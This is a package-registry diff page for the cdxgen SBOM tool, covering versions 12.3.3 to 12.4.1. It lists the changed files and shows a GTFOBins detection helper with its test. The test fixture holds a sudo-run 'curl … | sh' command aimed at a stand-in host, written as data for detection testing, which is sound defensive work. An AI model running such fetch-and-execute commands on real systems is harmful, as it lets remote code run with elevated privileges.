npm - @cyclonedx/cdxgen - Versions diffs - 12.3.3 → 12.4.1 - Mend

@cyclonedx/cdxgen 12.3.3 → 12.4.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (175) hide show

package/README.md +69 -25
package/bin/audit.js +21 -7
package/bin/cdxgen.js +270 -127
package/bin/convert.js +34 -15
package/bin/hbom.js +495 -0
package/bin/repl.js +592 -37
package/bin/validate.js +31 -4
package/bin/verify.js +18 -5
package/data/README.md +298 -25
package/data/component-tags.json +6 -0
package/data/crypto-oid.json +16 -0
package/data/cyclonedx-2.0-bundled.schema.json +7182 -0
package/data/predictive-audit-allowlist.json +11 -0
package/data/queries-darwin.json +12 -1
package/data/queries-win.json +7 -1
package/data/queries.json +39 -2
package/data/rules/ai-agent-governance.yaml +16 -0
package/data/rules/asar-archives.yaml +150 -0
package/data/rules/chrome-extensions.yaml +8 -0
package/data/rules/ci-permissions.yaml +42 -18
package/data/rules/container-risk.yaml +14 -7
package/data/rules/dependency-sources.yaml +11 -0
package/data/rules/hbom-compliance.yaml +325 -0
package/data/rules/hbom-performance.yaml +307 -0
package/data/rules/hbom-security.yaml +248 -0
package/data/rules/host-topology.yaml +165 -0
package/data/rules/mcp-servers.yaml +18 -3
package/data/rules/obom-runtime.yaml +907 -22
package/data/rules/package-integrity.yaml +14 -0
package/data/rules/rootfs-hardening.yaml +179 -0
package/data/rules/vscode-extensions.yaml +9 -0
package/lib/audit/index.js +210 -8
package/lib/audit/index.poku.js +332 -0
package/lib/audit/reporters.js +222 -0
package/lib/audit/targets.js +146 -1
package/lib/audit/targets.poku.js +186 -0
package/lib/cli/asar.poku.js +328 -0
package/lib/cli/index.js +527 -99
package/lib/cli/index.poku.js +1469 -212
package/lib/evinser/evinser.js +14 -9
package/lib/helpers/analyzer.js +1406 -29
package/lib/helpers/analyzer.poku.js +342 -0
package/lib/helpers/analyzerScope.js +712 -0
package/lib/helpers/asarutils.js +1556 -0
package/lib/helpers/asarutils.poku.js +443 -0
package/lib/helpers/auditCategories.js +12 -0
package/lib/helpers/auditCategories.poku.js +32 -0
package/lib/helpers/bomUtils.js +155 -1
package/lib/helpers/bomUtils.poku.js +79 -1
package/lib/helpers/cbomutils.js +271 -1
package/lib/helpers/cbomutils.poku.js +248 -5
package/lib/helpers/display.js +291 -1
package/lib/helpers/display.poku.js +149 -0
package/lib/helpers/evidenceUtils.js +58 -0
package/lib/helpers/evidenceUtils.poku.js +54 -0
package/lib/helpers/exportUtils.js +9 -0
package/lib/helpers/gtfobins.js +142 -8
package/lib/helpers/gtfobins.poku.js +24 -1
package/lib/helpers/hbom.js +710 -0
package/lib/helpers/hbom.poku.js +496 -0
package/lib/helpers/hbomAnalysis.js +268 -0
package/lib/helpers/hbomAnalysis.poku.js +249 -0
package/lib/helpers/hbomLoader.js +35 -0
package/lib/helpers/hostTopology.js +803 -0
package/lib/helpers/hostTopology.poku.js +363 -0
package/lib/helpers/inventoryStats.js +69 -0
package/lib/helpers/inventoryStats.poku.js +86 -0
package/lib/helpers/lolbas.js +19 -1
package/lib/helpers/lolbas.poku.js +23 -0
package/lib/helpers/osqueryTransform.js +47 -0
package/lib/helpers/osqueryTransform.poku.js +47 -0
package/lib/helpers/plugins.js +350 -0
package/lib/helpers/plugins.poku.js +57 -0
package/lib/helpers/protobom.js +209 -45
package/lib/helpers/protobom.poku.js +183 -5
package/lib/helpers/protobomLoader.js +43 -0
package/lib/helpers/protobomLoader.poku.js +31 -0
package/lib/helpers/remote/dependency-track.js +36 -3
package/lib/helpers/remote/dependency-track.poku.js +44 -0
package/lib/helpers/source.js +24 -0
package/lib/helpers/source.poku.js +32 -0
package/lib/helpers/utils.js +1438 -93
package/lib/helpers/utils.poku.js +846 -4
package/lib/managers/binary.e2e.poku.js +367 -0
package/lib/managers/binary.js +2293 -353
package/lib/managers/binary.poku.js +1699 -1
package/lib/managers/docker.js +201 -79
package/lib/managers/docker.poku.js +337 -12
package/lib/server/server.js +4 -28
package/lib/stages/postgen/annotator.js +38 -0
package/lib/stages/postgen/annotator.poku.js +107 -1
package/lib/stages/postgen/auditBom.js +121 -18
package/lib/stages/postgen/auditBom.poku.js +1366 -31
package/lib/stages/postgen/hostTopologyAudit.poku.js +186 -0
package/lib/stages/postgen/postgen.js +406 -8
package/lib/stages/postgen/postgen.poku.js +484 -0
package/lib/stages/postgen/ruleEngine.js +116 -0
package/lib/stages/pregen/envAudit.js +14 -3
package/lib/validator/bomValidator.js +90 -38
package/lib/validator/bomValidator.poku.js +90 -0
package/lib/validator/complianceRules.js +4 -2
package/lib/validator/index.poku.js +14 -0
package/package.json +23 -21
package/types/bin/hbom.d.ts +3 -0
package/types/bin/hbom.d.ts.map +1 -0
package/types/bin/repl.d.ts +1 -1
package/types/bin/repl.d.ts.map +1 -1
package/types/lib/audit/index.d.ts +44 -0
package/types/lib/audit/index.d.ts.map +1 -1
package/types/lib/audit/reporters.d.ts +16 -0
package/types/lib/audit/reporters.d.ts.map +1 -1
package/types/lib/audit/targets.d.ts.map +1 -1
package/types/lib/cli/index.d.ts +16 -0
package/types/lib/cli/index.d.ts.map +1 -1
package/types/lib/evinser/evinser.d.ts +4 -0
package/types/lib/evinser/evinser.d.ts.map +1 -1
package/types/lib/helpers/analyzer.d.ts +33 -0
package/types/lib/helpers/analyzer.d.ts.map +1 -1
package/types/lib/helpers/analyzerScope.d.ts +11 -0
package/types/lib/helpers/analyzerScope.d.ts.map +1 -0
package/types/lib/helpers/asarutils.d.ts +34 -0
package/types/lib/helpers/asarutils.d.ts.map +1 -0
package/types/lib/helpers/auditCategories.d.ts +5 -0
package/types/lib/helpers/auditCategories.d.ts.map +1 -1
package/types/lib/helpers/bomUtils.d.ts +10 -0
package/types/lib/helpers/bomUtils.d.ts.map +1 -1
package/types/lib/helpers/cbomutils.d.ts +3 -2
package/types/lib/helpers/cbomutils.d.ts.map +1 -1
package/types/lib/helpers/display.d.ts.map +1 -1
package/types/lib/helpers/evidenceUtils.d.ts +8 -0
package/types/lib/helpers/evidenceUtils.d.ts.map +1 -0
package/types/lib/helpers/exportUtils.d.ts.map +1 -1
package/types/lib/helpers/gtfobins.d.ts +8 -0
package/types/lib/helpers/gtfobins.d.ts.map +1 -1
package/types/lib/helpers/hbom.d.ts +49 -0
package/types/lib/helpers/hbom.d.ts.map +1 -0
package/types/lib/helpers/hbomAnalysis.d.ts +76 -0
package/types/lib/helpers/hbomAnalysis.d.ts.map +1 -0
package/types/lib/helpers/hbomLoader.d.ts +7 -0
package/types/lib/helpers/hbomLoader.d.ts.map +1 -0
package/types/lib/helpers/hostTopology.d.ts +12 -0
package/types/lib/helpers/hostTopology.d.ts.map +1 -0
package/types/lib/helpers/inventoryStats.d.ts +11 -0
package/types/lib/helpers/inventoryStats.d.ts.map +1 -0
package/types/lib/helpers/lolbas.d.ts.map +1 -1
package/types/lib/helpers/osqueryTransform.d.ts +3 -0
package/types/lib/helpers/osqueryTransform.d.ts.map +1 -1
package/types/lib/helpers/plugins.d.ts +58 -0
package/types/lib/helpers/plugins.d.ts.map +1 -0
package/types/lib/helpers/protobom.d.ts +5 -4
package/types/lib/helpers/protobom.d.ts.map +1 -1
package/types/lib/helpers/protobomLoader.d.ts +17 -0
package/types/lib/helpers/protobomLoader.d.ts.map +1 -0
package/types/lib/helpers/remote/dependency-track.d.ts +10 -3
package/types/lib/helpers/remote/dependency-track.d.ts.map +1 -1
package/types/lib/helpers/source.d.ts.map +1 -1
package/types/lib/helpers/utils.d.ts +45 -8
package/types/lib/helpers/utils.d.ts.map +1 -1
package/types/lib/managers/binary.d.ts +5 -0
package/types/lib/managers/binary.d.ts.map +1 -1
package/types/lib/managers/docker.d.ts.map +1 -1
package/types/lib/server/server.d.ts +2 -1
package/types/lib/server/server.d.ts.map +1 -1
package/types/lib/stages/postgen/annotator.d.ts.map +1 -1
package/types/lib/stages/postgen/auditBom.d.ts +26 -1
package/types/lib/stages/postgen/auditBom.d.ts.map +1 -1
package/types/lib/stages/postgen/postgen.d.ts +2 -1
package/types/lib/stages/postgen/postgen.d.ts.map +1 -1
package/types/lib/stages/postgen/ruleEngine.d.ts.map +1 -1
package/types/lib/stages/pregen/envAudit.d.ts.map +1 -1
package/types/lib/third-party/arborist/lib/node.d.ts +23 -0
package/types/lib/third-party/arborist/lib/node.d.ts.map +1 -1
package/types/lib/validator/bomValidator.d.ts.map +1 -1
package/types/lib/validator/complianceRules.d.ts.map +1 -1
package/data/spdx-model-v3.0.1.jsonld +0 -15999

package/lib/helpers/gtfobins.js CHANGED Viewed

@@ -1,11 +1,25 @@
 import { readFileSync } from "node:fs";
-import { basename, join } from "node:path";
+import { basename } from "node:path";
+import { fileURLToPath } from "node:url";
-import { dirNameStr, safeExistsSync } from "./utils.js";
-const GTFOBINS_INDEX_FILE = join(dirNameStr, "data", "gtfobins-index.json");
+const GTFOBINS_INDEX_FILE = fileURLToPath(
+  new URL("../../data/gtfobins-index.json", import.meta.url),
+);
 const GTFOBINS_REFERENCE_PREFIX = "https://gtfobins.github.io/gtfobins/";
 const PRIVILEGED_CONTEXTS = ["sudo", "suid", "capabilities"];
+const MATCH_FIELDS = [
+  "name",
+  "path",
+  "cmdline",
+  "parent_cmdline",
+  "action",
+  "program",
+  "executable",
+  "description",
+];
+const UNIX_PATH_PATTERN = /(?:^|[\s'"`=;|&(])((?:\.{0,2}\/|\/)[^\s'"`|;&()]+)/g;
+const STANDALONE_COMMAND_PATTERN =
+  /(?:^|[\s;|&(])([a-z_][a-z0-9+._-]{1,})(?=$|[\s'"`|;&()])/gi;
 const CONTAINER_ESCAPE_HELPERS = new Set([
   "chroot",
   "ctr",
@@ -29,9 +43,6 @@ const VERSIONED_ALIASES = [
 const GTFOBINS_INDEX = loadGtfoBinsIndex();
 function loadGtfoBinsIndex() {
-  if (!safeExistsSync(GTFOBINS_INDEX_FILE)) {
-    return { entries: {}, source: GTFOBINS_REFERENCE_PREFIX, sourceRef: "" };
-  }
   try {
     return JSON.parse(readFileSync(GTFOBINS_INDEX_FILE, "utf8"));
   } catch {
@@ -39,6 +50,32 @@ function loadGtfoBinsIndex() {
   }
 }
+function uniqueSortedStrings(values) {
+  return [...new Set((values || []).filter(Boolean))].sort();
+}
+function collectValueCandidates(value) {
+  if (!value || typeof value !== "string") {
+    return [];
+  }
+  const candidates = new Set();
+  const trimmedValue = value.trim();
+  if (trimmedValue) {
+    candidates.add(trimmedValue);
+  }
+  for (const match of value.matchAll(UNIX_PATH_PATTERN)) {
+    if (match[1]) {
+      candidates.add(match[1]);
+    }
+  }
+  for (const match of value.matchAll(STANDALONE_COMMAND_PATTERN)) {
+    if (match[1]) {
+      candidates.add(match[1]);
+    }
+  }
+  return Array.from(candidates);
+}
 function resolveCandidateName(candidate) {
   if (!candidate || typeof candidate !== "string") {
     return undefined;
@@ -123,7 +160,7 @@ export function getGtfoBinsMetadata(name, linkedName) {
       functions: entry.functions,
       matchSource: directMatch.matchSource,
       mitreTechniques: entry.mitreTechniques,
-      privilegedContexts: entry.contexts.filter((context) =>
+      privilegedContexts: entry?.contexts?.filter((context) =>
         PRIVILEGED_CONTEXTS.includes(context),
       ),
       reference: `${GTFOBINS_REFERENCE_PREFIX}${encodeURIComponent(directMatch.canonicalName)}/`,
@@ -187,3 +224,100 @@ export function createGtfoBinsProperties(name, linkedName) {
   }
   return properties;
 }
+/**
+ * Resolve GTFOBins properties for a live Linux osquery row.
+ *
+ * @param {string} queryCategory Osquery query category
+ * @param {object} row Osquery row
+ * @returns {Array<object>} CycloneDX custom properties
+ */
+export function createGtfoBinsPropertiesFromRow(queryCategory, row) {
+  const matches = new Map();
+  for (const field of MATCH_FIELDS) {
+    const fieldValue = row?.[field];
+    if (!fieldValue) {
+      continue;
+    }
+    for (const candidate of collectValueCandidates(String(fieldValue))) {
+      const metadata = getGtfoBinsMetadata(candidate);
+      if (!metadata) {
+        continue;
+      }
+      const existing = matches.get(metadata.canonicalName) || {
+        fields: new Set(),
+        metadata,
+      };
+      existing.fields.add(field);
+      matches.set(metadata.canonicalName, existing);
+    }
+  }
+  if (!matches.size) {
+    return [];
+  }
+  const names = uniqueSortedStrings(Array.from(matches.keys()));
+  const matchFields = uniqueSortedStrings(
+    Array.from(matches.values()).flatMap((match) => Array.from(match.fields)),
+  );
+  const functions = uniqueSortedStrings(
+    Array.from(matches.values()).flatMap((match) => match.metadata.functions),
+  );
+  const contexts = uniqueSortedStrings(
+    Array.from(matches.values()).flatMap((match) => match.metadata.contexts),
+  );
+  const privilegedContexts = uniqueSortedStrings(
+    Array.from(matches.values()).flatMap(
+      (match) => match.metadata.privilegedContexts,
+    ),
+  );
+  const references = uniqueSortedStrings(
+    Array.from(matches.values()).map((match) => match.metadata.reference),
+  );
+  const riskTags = uniqueSortedStrings(
+    Array.from(matches.values()).flatMap((match) => match.metadata.riskTags),
+  );
+  const mitreTechniques = uniqueSortedStrings(
+    Array.from(matches.values()).flatMap(
+      (match) => match.metadata.mitreTechniques,
+    ),
+  );
+  const properties = [
+    { name: "cdx:gtfobins:matched", value: "true" },
+    { name: "cdx:gtfobins:names", value: names.join(",") },
+    { name: "cdx:gtfobins:matchFields", value: matchFields.join(",") },
+    { name: "cdx:gtfobins:queryCategory", value: queryCategory },
+    { name: "cdx:gtfobins:reference", value: references.join(",") },
+    { name: "cdx:gtfobins:sourceRef", value: GTFOBINS_INDEX.sourceRef || "" },
+  ];
+  if (functions.length) {
+    properties.push({
+      name: "cdx:gtfobins:functions",
+      value: functions.join(","),
+    });
+  }
+  if (contexts.length) {
+    properties.push({
+      name: "cdx:gtfobins:contexts",
+      value: contexts.join(","),
+    });
+  }
+  if (privilegedContexts.length) {
+    properties.push({
+      name: "cdx:gtfobins:privilegedContexts",
+      value: privilegedContexts.join(","),
+    });
+  }
+  if (riskTags.length) {
+    properties.push({
+      name: "cdx:gtfobins:riskTags",
+      value: riskTags.join(","),
+    });
+  }
+  if (mitreTechniques.length) {
+    properties.push({
+      name: "cdx:gtfobins:mitreTechniques",
+      value: mitreTechniques.join(","),
+    });
+  }
+  return properties;
+}

package/lib/helpers/gtfobins.poku.js CHANGED Viewed

@@ -2,7 +2,11 @@ import { strict as assert } from "node:assert";
 import { describe, it } from "poku";
-import { createGtfoBinsProperties, getGtfoBinsMetadata } from "./gtfobins.js";
+import {
+  createGtfoBinsProperties,
+  createGtfoBinsPropertiesFromRow,
+  getGtfoBinsMetadata,
+} from "./gtfobins.js";
 describe("gtfobins helpers", () => {
   it("returns metadata for exact GTFOBins matches", () => {
@@ -46,4 +50,23 @@ describe("gtfobins helpers", () => {
       propertyMap["cdx:gtfobins:reference"].endsWith("/gtfobins/docker/"),
     );
   });
+  it("derives GTFOBins properties from live Linux osquery rows", () => {
+    const properties = createGtfoBinsPropertiesFromRow("sudo_executions", {
+      path: "/usr/bin/bash",
+      cmdline: "bash -c 'curl https://example.invalid/p.sh | sh'",
+      parent_cmdline: "sudo bash -c payload",
+    });
+    const propertyMap = Object.fromEntries(
+      properties.map((property) => [property.name, property.value]),
+    );
+    assert.strictEqual(propertyMap["cdx:gtfobins:matched"], "true");
+    assert.ok(propertyMap["cdx:gtfobins:names"].includes("bash"));
+    assert.ok(propertyMap["cdx:gtfobins:functions"].includes("shell"));
+    assert.ok(
+      propertyMap["cdx:gtfobins:queryCategory"].includes("sudo_executions"),
+    );
+    assert.ok(propertyMap["cdx:gtfobins:matchFields"].includes("path"));
+    assert.ok(propertyMap["cdx:gtfobins:matchFields"].includes("cmdline"));
+  });
 });